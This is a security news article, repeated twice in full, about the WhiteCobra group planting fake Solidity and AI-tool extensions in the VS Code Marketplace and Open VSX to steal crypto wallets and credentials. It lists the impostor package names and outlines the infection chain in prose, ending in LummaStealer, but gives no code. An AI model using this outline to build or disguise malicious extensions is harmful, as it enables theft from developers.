- 21
- 1
WhiteCobra hackers have turned code editors into weapons of mass destruction.
The WhiteCobra hacker group launched a large-scale attack against users of the popular code editors VS Code, Cursor, and Windsurf. Researchers from Koi Security discovered 24 malicious extensions hosted in the official Visual Studio Marketplace and Open VSX repositories. Despite removing some of them, the attackers continue to upload new versions, keeping the campaign active.
One of the victims was Ethereum developer Zach Cole, whose crypto wallet was emptied after installing the contractshark.solidity-lang add-on for the Cursor editor. The extension appeared legitimate: it had a professionally designed icon, a detailed description, and tens of thousands of downloads.
This disguise allowed WhiteCobra to attract a large number of users. The same group was previously implicated in a July theft of approximately half a million dollars in cryptocurrency by distributing a fake Cursor extension.
The attack exploits a vulnerability in the ecosystem itself: a single VSIX package format is used across multiple editors, and downloaded add-ons undergo minimal verification. This allows the attackers to quickly adapt and scale their campaign.
Koi Security notes that each of the created extensions mimics legitimate projects, copying their names and descriptions. The list of detected fake packages includes ChainDevTools.solidity-pro, kilocode-ai.kilo-code, nomic-fdn.hardhat-solidity, juan-blanco.solidity, Ethereum.solidity-ethereum, and many others. They were found in both Open-VSX and the VS Code Marketplace.
Technically, the malicious add-ons are quite simple. The main extension.js file almost exactly replicates the "Hello World" template, but contains a hidden call to another script, prompt.js. This script, in turn, downloads the payload from Cloudflare Pages servers. For Windows, a PowerShell script is provided that runs Python code and injects shellcode, which then activates LummaStealer, a known data-stealing Trojan. It targets cryptocurrency wallets, browser extensions, saved passwords, and instant messaging conversations. On macOS, a Mach-O binary for ARM and Intel is used, which downloads another, as yet unclassified, malware.
Experts obtained an internal WhiteCobra playbook detailing the campaigns' financial goals, methods for promoting fake extensions, and instructions for deploying a command and control infrastructure. This data suggests the group operates in an organized manner and can launch new waves of attacks within three hours of blocking previous ones. The documents list sums ranging from $10,000 to half a million dollars, which the criminals plan to obtain in a single series of operations.
Experts emphasize that traditional benchmarks such as download counts, positive reviews, and ratings are no longer a reliable indicator of security. These metrics are easily manipulated, and fake projects often impersonate the names of well-known developers or organizations. Therefore, it is recommended to carefully check extensions before installing them, pay attention to suspicious name similarities, and be wary of projects that have quickly accumulated tens of thousands of downloads.
WhiteCobra has clearly demonstrated vulnerabilities in the VS Code ecosystem and compatible editors, where a lack of strict moderation allows malicious extensions to be introduced, disguised as popular tools. For users, this means extra caution, as even a familiar work tool can become a channel for the theft of cryptocurrency and credentials.
The WhiteCobra hacker group launched a large-scale attack against users of the popular code editors VS Code, Cursor, and Windsurf. Researchers from Koi Security discovered 24 malicious extensions hosted in the official Visual Studio Marketplace and Open VSX repositories. Despite removing some of them, the attackers continue to upload new versions, keeping the campaign active.
One of the victims was Ethereum developer Zach Cole, whose crypto wallet was emptied after installing the contractshark.solidity-lang add-on for the Cursor editor. The extension appeared legitimate: it had a professionally designed icon, a detailed description, and tens of thousands of downloads.
This disguise allowed WhiteCobra to attract a large number of users. The same group was previously implicated in a July theft of approximately half a million dollars in cryptocurrency by distributing a fake Cursor extension.
The attack exploits a vulnerability in the ecosystem itself: a single VSIX package format is used across multiple editors, and downloaded add-ons undergo minimal verification. This allows the attackers to quickly adapt and scale their campaign.
Koi Security notes that each of the created extensions mimics legitimate projects, copying their names and descriptions. The list of detected fake packages includes ChainDevTools.solidity-pro, kilocode-ai.kilo-code, nomic-fdn.hardhat-solidity, juan-blanco.solidity, Ethereum.solidity-ethereum, and many others. They were found in both Open-VSX and the VS Code Marketplace.
Technically, the malicious add-ons are quite simple. The main extension.js file almost exactly replicates the "Hello World" template, but contains a hidden call to another script, prompt.js. This script, in turn, downloads the payload from Cloudflare Pages servers. For Windows, a PowerShell script is provided that runs Python code and injects shellcode, which then activates LummaStealer, a known data-stealing Trojan. It targets cryptocurrency wallets, browser extensions, saved passwords, and instant messaging conversations. On macOS, a Mach-O binary for ARM and Intel is used, which downloads another, as yet unclassified, malware.
Experts obtained an internal WhiteCobra playbook detailing the campaigns' financial goals, methods for promoting fake extensions, and instructions for deploying a command and control infrastructure. This data suggests the group operates in an organized manner and can launch new waves of attacks within three hours of blocking previous ones. The documents list sums ranging from $10,000 to half a million dollars, which the criminals plan to obtain in a single series of operations.
Experts emphasize that traditional benchmarks such as download counts, positive reviews, and ratings are no longer a reliable indicator of security. These metrics are easily manipulated, and fake projects often impersonate the names of well-known developers or organizations. Therefore, it is recommended to carefully check extensions before installing them, pay attention to suspicious name similarities, and be wary of projects that have quickly accumulated tens of thousands of downloads.
WhiteCobra has clearly demonstrated vulnerabilities in the VS Code ecosystem and compatible editors, where a lack of strict moderation allows malicious extensions to be introduced, disguised as popular tools. For users, this means extra caution, as even a familiar work tool can become a channel for the theft of cryptocurrency and credentials.